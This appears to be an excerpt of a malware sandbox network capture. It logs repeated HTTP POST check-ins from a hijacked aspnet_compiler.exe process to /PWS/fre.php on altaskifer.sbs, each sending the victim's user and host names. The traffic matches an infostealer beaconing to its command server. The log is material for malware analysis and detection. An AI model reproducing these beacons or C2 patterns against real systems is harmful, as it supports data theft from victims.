                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NXvxEsoq2uHiFTG6y0KzIfAQ4PaiUOF%2B2l8XKYyuFbQMOcpj6cVSr9iV7YMEsyMLc%2F0C%2FfrIJLlSI%2Fsi%2FAoNjqWFlxl75VKaowJr1SiAFazauaXI95pEeREKKO4D7WLEdg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011bbe9f78dac-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                32192.168.2.649757172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:52.706701040 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:52.831208944 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:53.204463959 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:53 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CdVSgMhGj1pcUmIxcBj7mZL3m0UDsubMCJrwQCdbs1FVrot6kbiKluvGLmQ5pu%2FHi%2FXQoEqyUDwNUeGox%2FM62WTJmLAanTtEGT0G9%2B5WMyt9FmB0wDX%2F9l5jQ380na%2Fbbw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011c0d928a558-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                33192.168.2.649758172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:53.470084906 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:53.595801115 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:53.977397919 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:53 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GKgDapP8JSaXx2iTlrukWhm5OwI4gu1NXTdiDzxtla4B3YSuaO9FRU0F20FZcCb4DdOOWWCGQTgPgZbBUZ%2FPjUsBfzcQCIzCjXahAvSSmRFjOL9rFeca84vMTE7Mr7GHoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011c598f7da8b-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                34192.168.2.649759172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:54.259588003 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:54.383791924 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:54.765850067 CEST611INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:54 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecJkXhLfYbCmlHR9zhHpRGgH%2BmTMGQY2MLHJCHbz9BtssggRKnPCcBRmxGrLO0MM26vcuQe%2BU0dWq%2Bi%2FX707b5GFvH41vA88g%2FLU%2FTA%2B1ACmm4HkCRHDYth%2FBtgjnLxVsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011ca8d2c8dfc-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                35192.168.2.649760172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:55.035047054 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:55.159293890 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:55.538187027 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:55 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etE5AqzPg%2Fp5BABSnOixLhQiwNwr2ja0Le0zwg9pn%2FqX0Ph2oZqf4QKq1Yg6H9tWWhcdeqw1sKqVPEsb09rSnORZexbOONhKYw2%2FLUyu85l8oT39aNMBqs4qidDdI6IzzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011cf59379acf-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                36192.168.2.649761172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:55.812911034 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:55.937916040 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:56.323726892 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:56 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J8Ed%2BESZbfYAjg69WiYZEBDfBoTC5GDJLF03VgoYYCxw1dPS6SzLKmKbGOOl2WFflba0va0h56L3ARj7Vmfzu7AUur0uvOjPX5sBbBf5L4FRfDrZpVzubWFHxR0uO6lbmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011d43dd174aa-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                37192.168.2.649762172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:56.595283031 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:56.719551086 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:57.097526073 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:57 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D6P5tZWVzpJLz43XaJ%2Fv6b4z5LLormL6XLUnEzmrHipGj74SRxfkpjc3R2jlTsrligntW8tCIC4gK3IlPl2MY2q43b0LMO%2BjRRRd%2B9G%2B%2FeZNxznLnwnAtvWdxsA4se3%2Bhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011d91a53a554-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                38192.168.2.649763172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:57.360186100 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:57.484811068 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:57.853610039 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:57 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5pkg7WqhsY%2FngyicWhfUGEywdw2q%2BFpwksbpMVdSuvVL3yPSCt0CO7Dxw6v2E6m7uCCwRV6oZX4CjsCDD6U3%2Bdycutv0PHDzZasq8FEmFMVbvXVYGf%2F1aAQgYr4BDWBF4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011ddefb9748d-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                39192.168.2.649764172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:58.128552914 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:58.252881050 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:58.658344984 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:58 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LbGcZepgXDQMYEqteHeCKgkBkGe%2F2fcb3CnlbQWgQijbG7ZnbWL2uNl6jw4gMagSJ%2BNn4QJca%2BW5KDWQPOdGqiimrqSUrZkdTBPbUmR6u1TuIP3n2zzGMejhBrgIbx%2B5Wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011e2bcc82589-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                40192.168.2.649765172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:58.921065092 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:59.047959089 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:59.422697067 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:59 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KQWLx8XDMfgQu0WQ1%2B%2Ft7t1FZZ%2FnSWKuP150IEVE1w3ysz14GeDEkMTjHj6CZMNztYJzFuUHTxBNs2ZgWSWSQohtXtNRH0JOFySOy1Nr%2FEoB11w3vlwzkoT7fDhkvTOeJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011e7a8b25c7c-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                41192.168.2.649766172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:59.690030098 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:59.813829899 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:00.210206985 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:00 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4gVvu92rPAxY7UifkgQdDlNaXwDRTDHUU%2BmP36BAQetUgps8cw3Fp9ss1zpkWLx3KYBm%2Fk4R%2F77nFGYdH97uCSU3OBcDoiQbfDDjee8NY2SpBHTzQzJIK2cKu0%2BA6dHVZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011ec7cfb8dc6-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                42192.168.2.649767172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:00.493398905 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:00.617283106 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:01.013169050 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:00 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IahZIT4tvxvSLBo5fYqX4ZrCe3sCvTJi%2BY9%2Fi4ArsbwyMaklD3hCfSWqIO1MRYOcjShP2z%2FnOxSUSQn14mD%2FXP7i%2BxCAT8bolqvOr7HmAxuVJF0TjWdfTITENZ7kw3WH4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011f179fb8da8-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                43192.168.2.649768172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:01.279269934 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:01.403219938 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:01.774059057 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:01 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AT3YPz6o6szhrf6atFOql9n4tWCLpQKz%2FuAazdDJXFBB4SqHdiDx%2BXoB%2Bl1UzJAdGj9ocpfL5vlEpEn7BgycrrG0nNLi4w7bHmM1Dunn069793GQ%2FalOYh6%2BkZqoEgEo6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011f66ad8a54e-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                44192.168.2.649769172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:02.046577930 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:02.170840979 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:02.541439056 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:02 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6YOvhgdIT6Z2jf9fyoYXsEO778yKErcrSlsXext1rBY%2FC7Yg8YyWdv7vb8356uxWLjksPiHmeWg3HIRuqlAqrQBNL3xCjNU22LHLNV6G%2FsSLTfx59M1XwmVNKg%2FREhIMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011fb38f1747f-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                45192.168.2.649770172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:02.814836979 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:02.938760042 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:03.323903084 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:03 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
